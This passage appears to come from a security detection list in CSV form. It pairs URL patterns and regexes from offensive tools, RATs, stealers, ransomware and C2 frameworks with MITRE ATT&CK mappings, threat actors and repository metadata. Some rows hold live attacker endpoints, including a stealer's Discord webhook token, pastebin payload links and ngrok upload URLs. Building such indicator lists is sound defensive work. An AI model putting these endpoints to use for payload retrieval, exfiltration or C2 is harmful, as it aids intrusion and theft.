"*https://localhost:7443/*",".{0,1000}https\:\/\/localhost\:7443\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","47808"
"*https://mainstream.ngrok.app/?method=UploadFile&filename=*",".{0,1000}https\:\/\/mainstream\.ngrok\.app\/\?method\=UploadFile\&filename\=.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","47815"
"*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*",".{0,1000}https\:\/\/mastodon\.be\/\@username_fzihfzuhfuoz\/109994357971853428.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","47816"
"*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*",".{0,1000}https\:\/\/mastodon\.be\/username_fzihfzuhfuoz\/109743339821428173.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","47817"
"*https://md5.navisec.it*",".{0,1000}https\:\/\/md5\.navisec\.it.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47819"
"*https://md5decrypt.net*",".{0,1000}https\:\/\/md5decrypt\.net.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47820"
"*https://media0.giphy.com/media/l0IynvAIYxm8ZGUrm/giphy.gif?cid=ecf05e47qvbyv5iod2z91r9bufnpkvsjn1xm18a63b0g8z9a&ep=v1_gifs_related&rid=giphy.gif&ct=g*",".{0,1000}https\:\/\/media0\.giphy\.com\/media\/l0IynvAIYxm8ZGUrm\/giphy\.gif\?cid\=ecf05e47qvbyv5iod2z91r9bufnpkvsjn1xm18a63b0g8z9a\&ep\=v1_gifs_related\&rid\=giphy\.gif\&ct\=g.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","47830"
"*https://minio.pico.sh*",".{0,1000}https\:\/\/minio\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","47841"
"*https://mp.weixin.qq.com/s/GDPAC_9-Pxfcj_z0_C_ixw*",".{0,1000}https\:\/\/mp\.weixin\.qq\.com\/s\/GDPAC_9\-Pxfcj_z0_C_ixw.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","1","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","47842"
"*https://mrd0x.com/progressive-web-apps-pwa-phishing*",".{0,1000}https\:\/\/mrd0x\.com\/progressive\-web\-apps\-pwa\-phishing.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","1","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","47843"
"*https://nemesis.*.com/api/*",".{0,1000}https\:\/\/nemesis\..{0,1000}\.com\/api\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47845"
"*https://nsocks.net/*",".{0,1000}https\:\/\/nsocks\.net\/.{0,1000}","offensive_tool_keyword","nsocks","proxy service that allows users to route their traffic through SOCKS5 proxie","T1090.002 - T1090 - T1071.001 - T1572","TA0011 - TA0005","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","1","N/A","N/A","9","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","47849"
"*https://nsocks.net/proxy*",".{0,1000}https\:\/\/nsocks\.net\/proxy.{0,1000}","offensive_tool_keyword","nsocks","socks5 proxy provider","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://nsocks.net","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47850"
"*https://nsocks4pvtcewb2ora3zk47ksx7dvazbxyhzp4myhegpthgkphpi7aad.onion/*",".{0,1000}https\:\/\/nsocks4pvtcewb2ora3zk47ksx7dvazbxyhzp4myhegpthgkphpi7aad\.onion\/.{0,1000}","offensive_tool_keyword","nsocks","socks5 proxy provider","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://nsocks.net","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47851"
"*https://ntlm.pw*",".{0,1000}https\:\/\/ntlm\.pw.{0,1000}","offensive_tool_keyword","ntlm.pw","Database of NTLM hashes","T1003 - T1555 - T1558","TA0006","N/A","Black Basta","Credential Access","https://ntlm.pw","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47853"
"*https://ntlm.pw/*",".{0,1000}https\:\/\/ntlm\.pw\/.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","Black Basta","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","N/A","8","1","8","0","2024-08-28T15:21:10Z","2023-12-12T16:41:35Z","47854"
"*https://passwordrecovery.io*",".{0,1000}https\:\/\/passwordrecovery\.io.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47858"
"*https://pastebin.com/9JyjcMAH*",".{0,1000}https\:\/\/pastebin\.com\/9JyjcMAH.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","47859"
"*https://pastebin.com/iBeTbXCw*",".{0,1000}https\:\/\/pastebin\.com\/iBeTbXCw.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","47860"
"*https://pastebin.com/raw/34gqdu7k*",".{0,1000}https\:\/\/pastebin\.com\/raw\/34gqdu7k.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47861"
"*https://pastebin.com/raw/88SGrHVh*",".{0,1000}https\:\/\/pastebin\.com\/raw\/88SGrHVh.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","47862"
"*https://pastebin.com/raw/9kha6nwh*",".{0,1000}https\:\/\/pastebin\.com\/raw\/9kha6nwh.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47863"
"*https://pastebin.com/raw/DDTVwwbu*",".{0,1000}https\:\/\/pastebin\.com\/raw\/DDTVwwbu.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47864"
"*https://pastebin.com/raw/fevFJe98*",".{0,1000}https\:\/\/pastebin\.com\/raw\/fevFJe98.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","47865"
"*https://pastebin.com/raw/rGCQC1zq*",".{0,1000}https\:\/\/pastebin\.com\/raw\/rGCQC1zq.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47866"
"*https://phppasswordhash.com/*",".{0,1000}https\:\/\/phppasswordhash\.com\/.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","1","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","47867"
"*https://pico.sh/getting-started*",".{0,1000}https\:\/\/pico\.sh\/getting\-started.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","47868"
"*https://pico.sh/tuns*",".{0,1000}https\:\/\/pico\.sh\/tuns.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","47869"
"*https://privatix-temp-mail-v1.p.rapidapi.com/request/domains/*",".{0,1000}https\:\/\/privatix\-temp\-mail\-v1\.p\.rapidapi\.com\/request\/domains\/.{0,1000}","offensive_tool_keyword","ShellSync","using the API of a disposable email address to use anytime - could be abused by malicious actors","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","47874"
"*https://privatix-temp-mail-v1.p.rapidapi.com/request/mail/id/null/*",".{0,1000}https\:\/\/privatix\-temp\-mail\-v1\.p\.rapidapi\.com\/request\/mail\/id\/null\/.{0,1000}","offensive_tool_keyword","ShellSync","using the API of a disposable email address to use anytime - could be abused by malicious actors","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","47876"
"*https://proxy.duckduckgo.com/iu/?u=https://pdxkmdcepvahysnnxe.pythonanywhere.com/image.jpg?cmd=*",".{0,1000}https\:\/\/proxy\.duckduckgo\.com\/iu\/\?u\=https\:\/\/pdxkmdcepvahysnnxe\.pythonanywhere\.com\/image\.jpg\?cmd\=.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","N/A","10","10","74","6","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z","47879"
"*https://ptb.discord.com/api/webhooks/1226217588959215726/AZaNnD4TIN-9sV-t0rsveiQxcROYaCVziI8BUa6CNPsUxdnW9mdHu7HnuQ55kQPXZ8_5*",".{0,1000}https\:\/\/ptb\.discord\.com\/api\/webhooks\/1226217588959215726\/AZaNnD4TIN\-9sV\-t0rsveiQxcROYaCVziI8BUa6CNPsUxdnW9mdHu7HnuQ55kQPXZ8_5.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","47880"
"*https://pyobfuscate.com*'eval': bytes.fromhex(*",".{0,1000}https\:\/\/pyobfuscate\.com.{0,1000}\'eval\'\:\sbytes\.fromhex\(.{0,1000}","offensive_tool_keyword","pyobfuscate","ADVANCED PYTHON OBFUSCATOR","T1027 - T1027.009","TA0005","N/A","N/A","Defense Evasion","https://pyobfuscate.com/pyd","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","47886"
"*https://pyobfuscate.com/pyd*",".{0,1000}https\:\/\/pyobfuscate\.com\/pyd.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","47887"
"*https://pyobfuscate.com/pyd*",".{0,1000}https\:\/\/pyobfuscate\.com\/pyd.{0,1000}","offensive_tool_keyword","pyobfuscate","ADVANCED PYTHON OBFUSCATOR","T1027 - T1027.009","TA0005","N/A","N/A","Defense Evasion","https://pyobfuscate.com/pyd","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","47888"
"*https://ratte.ngrok.app/main/mainer*",".{0,1000}https\:\/\/ratte\.ngrok\.app\/main\/mainer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","47899"
"*https://raw.githubusercontent.com/*/msg_x64.dll*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/.{0,1000}\/msg_x64\.dll.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","47900"
"*https://raw.githubusercontent.com/*/test/master/msg.dll*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/.{0,1000}\/test\/master\/msg\.dll.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","47901"
"*https://raw.githubusercontent.com/BlackArch/blackarch/master/mirror/mirror.lst*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/BlackArch\/blackarch\/master\/mirror\/mirror\.lst.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","47902"
"*https://raw.githubusercontent.com/KasRoudra/CamHacker*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/KasRoudra\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","N/A","10","","N/A","","","","47903"
"*https://raw.githubusercontent.com/KDot227/*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/KDot227\/.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","47904"
"*https://raw.githubusercontent.com/stamparm/aux/master/fetch-some-list.txt*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/stamparm\/aux\/master\/fetch\-some\-list\.txt.{0,1000}","offensive_tool_keyword","fetch-some-proxies","Simple Python script for fetching ""some"" (usable) proxies","T1090 - T1071 - T1070","TA0002 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/stamparm/fetch-some-proxies","1","1","N/A","N/A","9","6","585","138","2023-03-15T09:14:25Z","2016-10-09T22:39:56Z","47905"
"*https://reedarvin.thearvins.com/*",".{0,1000}https\:\/\/reedarvin\.thearvins\.com\/.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","47908"
"*https://saycheese*.serveo.net*",".{0,1000}https\:\/\/saycheese.{0,1000}\.serveo\.net.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","1","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","47918"
"*https://sharpsploit.cobbr.io/api*",".{0,1000}https\:\/\/sharpsploit\.cobbr\.io\/api.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","47927"
"*https://shop.hak5.org/pages/cloud-c2-feedback*",".{0,1000}https\:\/\/shop\.hak5\.org\/pages\/cloud\-c2\-feedback.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","47928"
"*'https://slack.com/api/channels.create'*",".{0,1000}\'https\:\/\/slack\.com\/api\/channels\.create\'.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","47931"
"*https://sliver.sh/install*",".{0,1000}https\:\/\/sliver\.sh\/install.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","47932"
"*https://sniff.su/*.gz*",".{0,1000}https\:\/\/sniff\.su\/.{0,1000}\.gz.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","47933"
"*https://sniff.su/*.zip*",".{0,1000}https\:\/\/sniff\.su\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","47934"
"*https://sourceforge.net/projects/winexe*",".{0,1000}https\:\/\/sourceforge\.net\/projects\/winexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","47935"
"*https://sped.lol/*",".{0,1000}https\:\/\/sped\.lol\/.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","47937"
"*https://SSHamble.com/*",".{0,1000}https\:\/\/SSHamble\.com\/.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","1","N/A","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","47938"
"*https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/*",".{0,1000}https\:\/\/sysdig\.com\/blog\/hiding\-linux\-processes\-for\-fun\-and\-profit\/.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","1","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","47944"
"*https://t.me/BotFather*",".{0,1000}https\:\/\/t\.me\/BotFather.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","372","62","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z","47945"
"*https://t.me/eightbase*",".{0,1000}https\:\/\/t\.me\/eightbase.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47946"
"*https://t.me/encrypthub*",".{0,1000}https\:\/\/t\.me\/encrypthub.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","47947"
"*https://t.me/machine1337*",".{0,1000}https\:\/\/t\.me\/machine1337.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","372","62","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z","47948"
"*https://t.me/MegaMedusaLog*",".{0,1000}https\:\/\/t\.me\/MegaMedusaLog.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47949"
